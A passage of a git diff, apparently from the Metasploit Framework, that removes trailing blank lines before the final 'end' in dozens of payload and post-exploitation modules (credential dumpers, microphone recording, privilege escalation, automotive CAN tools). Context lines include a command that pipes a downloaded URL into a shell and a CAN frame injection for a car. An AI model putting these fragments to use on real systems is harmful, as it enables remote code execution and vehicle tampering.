a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -30,5 +30,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index c95d117ade..fe210b6188 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -86,5 +86,4 @@ module MetasploitModule super(session) end - end diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index 2955f2b63a..e99f8f0e0f 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -37,5 +37,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 2f33c31801..d25a18d716 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -28,5 +28,4 @@ module MetasploitModule def generate_stage(opts={}) stage_payload(opts) end - end diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index c9ef45d28b..a72b2ce798 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -41,5 +41,4 @@ module MetasploitModule def library_path MetasploitPayloads.meterpreter_path('metsrv','x86.dll') end - end diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 73b88189e6..2bc8a6579c 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -93,5 +93,4 @@ module MetasploitModule super end - end diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 3d45226bff..79ed21c11e 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -55,5 +55,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index fa68387662..77694b2e74 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -29,5 +29,4 @@ module MetasploitModule def library_path File.join(Msf::Config.data_directory, "vncdll.x64.dll") end - end diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index e17395ab25..743a57aaa1 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index 8fc70b1fb1..90aa3ae50e 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -69,6 +69,5 @@ class MetasploitModule < Msf::Post print_error("The Intent could not be started: #{result}") end end - end diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb index 2426f7fc64..3628212c7e 100644 --- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -40,6 +40,5 @@ class MetasploitModule < Msf::Post print_status("Device should be unlocked or no longer require a pin") end - end diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb index 7d3af83589..5ff6029cdf 100644 --- a/modules/post/firefox/manage/webcam_chat.rb +++ b/modules/post/firefox/manage/webcam_chat.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Post })(this.send); | end - end diff --git a/modules/post/hardware/automotive/canprobe.rb b/modules/post/hardware/automotive/canprobe.rb index ad899f0458..0cbd325655 100644 --- a/modules/post/hardware/automotive/canprobe.rb +++ b/modules/post/hardware/automotive/canprobe.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Post end print_status("Probe Complete") end - end diff --git a/modules/post/hardware/automotive/getvinfo.rb b/modules/post/hardware/automotive/getvinfo.rb index 4de4ccca26..001827b392 100644 --- a/modules/post/hardware/automotive/getvinfo.rb +++ b/modules/post/hardware/automotive/getvinfo.rb @@ -99,5 +99,4 @@ class MetasploitModule < Msf::Post print_status("Cleared DTCs and reseting MIL") end end - end diff --git a/modules/post/hardware/automotive/identifymodules.rb b/modules/post/hardware/automotive/identifymodules.rb index aa039fecbf..ecdb4a9f11 100644 --- a/modules/post/hardware/automotive/identifymodules.rb +++ b/modules/post/hardware/automotive/identifymodules.rb @@ -46,5 +46,4 @@ class MetasploitModule < Msf::Post print_line(" #{"%3x" % id}") end end - end diff --git a/modules/post/hardware/automotive/malibu_overheat.rb b/modules/post/hardware/automotive/malibu_overheat.rb index 83ae933391..bd66c5ed57 100644 --- a/modules/post/hardware/automotive/malibu_overheat.rb +++ b/modules/post/hardware/automotive/malibu_overheat.rb @@ -30,5 +30,4 @@ class MetasploitModule < Msf::Post client.automotive.cansend(datastore['CANBUS'], "510", "10AD013CF048120B") end end - end diff --git a/modules/post/hardware/rftransceiver/rfpwnon.rb b/modules/post/hardware/rftransceiver/rfpwnon.rb index 23a24efe32..09bafe61cc 100644 --- a/modules/post/hardware/rftransceiver/rfpwnon.rb +++ b/modules/post/hardware/rftransceiver/rfpwnon.rb @@ -154,5 +154,4 @@ class MetasploitModule < Msf::Post print_status("Done") set_mode("IDLE") end - end diff --git a/modules/post/hardware/rftransceiver/transmitter.rb b/modules/post/hardware/rftransceiver/transmitter.rb index 57f65686d3..a04cc4dd82 100644 --- a/modules/post/hardware/rftransceiver/transmitter.rb +++ b/modules/post/hardware/rftransceiver/transmitter.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Post print_status("Finished transmitting") set_mode("idle") end - end diff --git a/modules/post/hardware/zigbee/zstumbler.rb b/modules/post/hardware/zigbee/zstumbler.rb index fe394e8405..99ea70733d 100644 --- a/modules/post/hardware/zigbee/zstumbler.rb +++ b/modules/post/hardware/zigbee/zstumbler.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb index 4f2982ef94..2ac56ead84 100644 --- a/modules/post/linux/busybox/enum_connections.rb +++ b/modules/post/linux/busybox/enum_connections.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Post print_error("Nothing read from file #{file}, file may be empty") end end - end diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb index 4ccedd8fa1..f8944ec144 100644 --- a/modules/post/linux/busybox/enum_hosts.rb +++ b/modules/post/linux/busybox/enum_hosts.rb @@ -46,5 +46,4 @@ class MetasploitModule < Msf::Post print_error("Nothing read from file: #{file}, file may be empty.") end end - end diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index 3bf5f9e570..00729895b2 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Post false end - end diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb index e5717acfe5..13756b257e 100644 --- a/modules/post/linux/busybox/ping_net.rb +++ b/modules/post/linux/busybox/ping_net.rb @@ -35,5 +35,4 @@ class MetasploitModule < Msf::Post p = store_loot('busybox.enum.network', 'text/plain', session, results, 'ping_results.txt', 'BusyBox Device Network Range Enumeration') print_good("Results saved to #{p}.") end - end diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb index 7774a94c15..a646b476a7 100644 --- a/modules/post/linux/busybox/set_dmz.rb +++ b/modules/post/linux/busybox/set_dmz.rb @@ -35,5 +35,4 @@ class MetasploitModule < Msf::Post vprint_status(cmd_exec('iptables --list')) end - end diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index cc056916f2..41c6ac02eb 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -52,5 +52,4 @@ class MetasploitModule < Msf::Post vprint_status(res) Rex.sleep(0.1) end - end diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index 8cf1403e17..2fe340e10f 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -156,5 +156,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index 7061d3b7e9..f106e8c26b 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index bf6c3732a1..1b149ff1be 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -115,5 +115,4 @@ class MetasploitModule < Msf::Post vim_hist = cat_file("#{home}/.viminfo") save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/ end - end diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index 09b8222401..34b3aa8acb 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -149,7 +149,6 @@ class MetasploitModule < Msf::Post save(:configs, configs) unless configs.empty? save(:chatlogs, chatlogs) unless chatlogs.empty? end - end =begin diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index 4d99046c2e..eed32dd1db 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index 36b733ffe8..875707fda9 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Post unshadowed end - end diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 6fe4dfce83..e79a692eaf 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -146,5 +146,4 @@ class MetasploitModule < Msf::Post extract_secrets(f) end end - end diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index 9361f99b5a..db057f6bfc 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -115,5 +115,4 @@ class MetasploitModule < Msf::Post cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}") end end - end diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 889df69e79..b0b1041969 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Post show_report(report, File.basename(filename)) end end - end diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 5ebf362f8e..1829f3dce9 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -365,5 +365,4 @@ class MetasploitModule < Msf::Post def iteration_count datastore['ITERATION_COUNT'] || 10 end - end diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 5c81efdd7e..64374416a4 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Post @ltype = "unix.environment" end end - end diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index bde1471327..28525b3511 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Post # return all found credentials creds end - end diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 92c5f1c11d..03fc9aee10 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/multi/gather/irssi_creds.rb b/modules/post/multi/gather/irssi_creds.rb index f862d3cc83..0a60061b05 100644 --- a/modules/post/multi/gather/irssi_creds.rb +++ b/modules/post/multi/gather/irssi_creds.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index cb693d0dff..2adceb4e92 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Post print_status("Credentials stored in: #{p.to_s}") end end - end diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index 152bd3768e..7402e27067 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -181,5 +181,4 @@ class MetasploitModule < Msf::Post create_credential(credential_data) end - end diff --git a/modules/post/multi/gather/rubygems_api_key.rb b/modules/post/multi/gather/rubygems_api_key.rb index 13818ec66c..46a1812cd2 100644 --- a/modules/post/multi/gather/rubygems_api_key.rb +++ b/modules/post/multi/gather/rubygems_api_key.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Post print_good("RubyGems API key stored in #{loot_path}") end end - end diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index 2571cd7d15..7c4ece4db4 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 47caa76d71..20d3ec7bbf 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -20,5 +20,4 @@ class MetasploitModule < Msf::Post print_status("Closing session #{session.inspect}...") session.kill end - end diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index fea758355b..6f17e10a51 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -26,5 +26,4 @@ class MetasploitModule < Msf::Post print_status("Response: #{res}") end - end diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index ca96c0c6c7..facac851a9 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -241,5 +241,4 @@ class MetasploitModule < Msf::Post end return nil end - end diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index 9de0dab7c6..d972e0e166 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -218,6 +218,5 @@ class MetasploitModule < Msf::Post end return error end - end diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index f300adb01b..f4f3b13357 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 1de6e3145a..994e9154c3 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Post print_good("#{rhost} - Audio recording saved: #{p}") end end - end diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index 59139cb62f..b8883e393e 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Post print_error "Timed out during sudo cleanup." end end - end diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 68851cc86d..36c27906f7 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -47,6 +47,5 @@ class MetasploitModule < Msf::Post end rm_f(rfile) end - end diff --git a/modules/post/multi/manage/zip.rb b/modules/post/multi/manage/zip.rb index cb81ca77f0..d324072f4b 100644 --- a/modules/post/multi/manage/zip.rb +++ b/modules/post/multi/manage/zip.rb @@ -137,6 +137,5 @@ class MetasploitModule < Msf::Post linux_zip end end - end diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 1d649bb3a6..5bb5dffb3f 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb @@ -185,5 +185,4 @@ class MetasploitModule < Msf::Post def print_error(msg='') super("#{session.session_host} - #{msg}") end - end diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index f3a99e6bd5..c89b9f260b 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Post print_status(out) end end - end diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index 93cedf86cf..174b95bc6f 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -282,7 +282,6 @@ class MetasploitModule < Msf::Post save(:account, account_data) if not account_data.nil? and not account_data.empty? save(:chatlogs, chatlogs) if not chatlogs.nil? and not chatlogs.empty? end - end =begin diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index de59e99229..4ca2a3f5bb 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Post # Save the raw version of the plist save(pref) end - end diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index e163adfb98..98ecb9efa0 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Post save(plist) if not plist.nil? end end - end diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 9cbc4653bd..f03c8924bc 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -154,7 +154,6 @@ class MetasploitModule < Msf::Post save(:preferences, prefs) if not prefs.nil? and not prefs.empty? save(:chatlogs, chatlogs) if not chatlogs.nil? and not chatlogs.empty? end - end =begin diff --git a/modules/post/osx/gather/enum_messages.rb b/modules/post/osx/gather/enum_messages.rb index 5420914835..90c8169c58 100644 --- a/modules/post/osx/gather/enum_messages.rb +++ b/modules/post/osx/gather/enum_messages.rb @@ -141,5 +141,4 @@ class MetasploitModule < Msf::Post print_good("#{peer} - #{e[:filename]} stored as: #{p}") end end - end diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index fa9fe8d683..b544b5bb5d 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -471,5 +471,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index c419684f20..dcde7685ac 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -213,5 +213,4 @@ class MetasploitModule < Msf::Post print_line(cred_tbl.to_s) end end - end diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index 11b091af59..c45009a1f8 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Post end return nil end - end diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index f09e8e2c72..7a5b44c386 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -51,5 +51,4 @@ class MetasploitModule < Msf::Post print_error("Failed to obtain SYSTEM access") end end - end diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index 8e47c0889c..6191d76fa8 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Post print_error("No working target found") end - end diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index d3c72c0100..a27823fc21 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Post end return found end - end diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 2a2e36e65e..01aa24089a 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 3b3506bafd..af779552db 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -328,5 +328,4 @@ class MetasploitModule < Msf::Post print_status("#{sysinfo['Computer']} appears to be a Physical Machine") end end - end diff --git a/modules/post/windows/gather/credentials/avira_password.rb b/modules/post/windows/gather/credentials/avira_password.rb index 62b37db016..faedc69edb 100644 --- a/modules/post/windows/gather/credentials/avira_password.rb +++ b/modules/post/windows/gather/credentials/avira_password.rb @@ -53,5 +53,4 @@ class MetasploitModule < Msf::Post print_good("MD5(Unicode) hash found: #{passwd}") print_good("Info: Password length is limited to 20 characters.") end - end diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index ef12ff72e3..85fa853bd5 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -319,5 +319,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index ec0ee1332e..14f930861f 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Post move_file(sc_path, target_path) target_path end - end diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index 35b2412173..17164c7ea4 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -196,5 +196,4 @@ class MetasploitModule < Msf::Post # Store data do_report(config) end - end diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index f7674ca440..a2393d5fa1 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -181,5 +181,4 @@ class MetasploitModule < Msf::Post ruby_time = Time.at(unix_time) ruby_time.strftime("%d/%m/%Y %H:%M:%S GMT %z") end - end diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index d1eaf01073..931bc82d8d 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Post create_credential_login(login_data.merge(service_data)) end end - end diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index ad4358434c..33f21604b2 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Post end return pass.pack("C*") end - end diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index f118a06871..a60b203a68 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index f7c2bb700a..14bc1e7d69 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Post aes.iv = iv if iv != nil aes.update(encrypted_data) + aes.final end - end diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index fd779fb5b6..61bd582e87 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb +++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -181,5 +181,4 @@ class MetasploitModule < Msf::Post return false end end - end diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index fed038618f..d95b989ebd 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Post print_status("Nimbuzz user credentials saved in: #{path}") end - end diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index cb1f8a6200..ac52df8fad 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -385,5 +385,4 @@ class MetasploitModule < Msf::Post print_status("Complete") end - end diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index 193c163abf..c91bcbf690 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb +++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -208,7 +208,6 @@ class MetasploitModule < Msf::Post aes.update(enc) + aes.final end - end =begin diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index 2b015689a5..15a770e561 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -171,6 +171,5 @@ puts hash.hexdigest print_error "No salt found. Cannot continue without salt, exiting" end end - end diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index 6e8e8450df..abde69fede 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -150,6 +150,5 @@ class MetasploitModule < Msf::Post system_users.find{|r| user.to_s.match(r)} end - end diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index 4b3f3f1cce..4207d495d9 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 7f02327f43..d4193fd39d 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -235,5 +235,4 @@ class MetasploitModule < Msf::Post print_status("Complete") end - end diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index 844aa670f8..abe9e70e83 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -187,5 +187,4 @@ class MetasploitModule < Msf::Post create_credential_login(login_data) end - end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 6e711ae6ba..0866c2d90b 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -147,6 +147,5 @@ class MetasploitModule < Msf::Post print_status("Results saved to: #{stored_path}") end end - end diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index b92d6ce29f..111558d86c 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb @@ -121,6 +121,5 @@ class MetasploitModule < Msf::Post rows end - end diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index 003737a3df..bdfe89bdc4 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -78,6 +78,5 @@ class MetasploitModule < Msf::Post print_status("Results saved to: #{stored_path}") end end - end diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index f991e0dfca..82885695b7 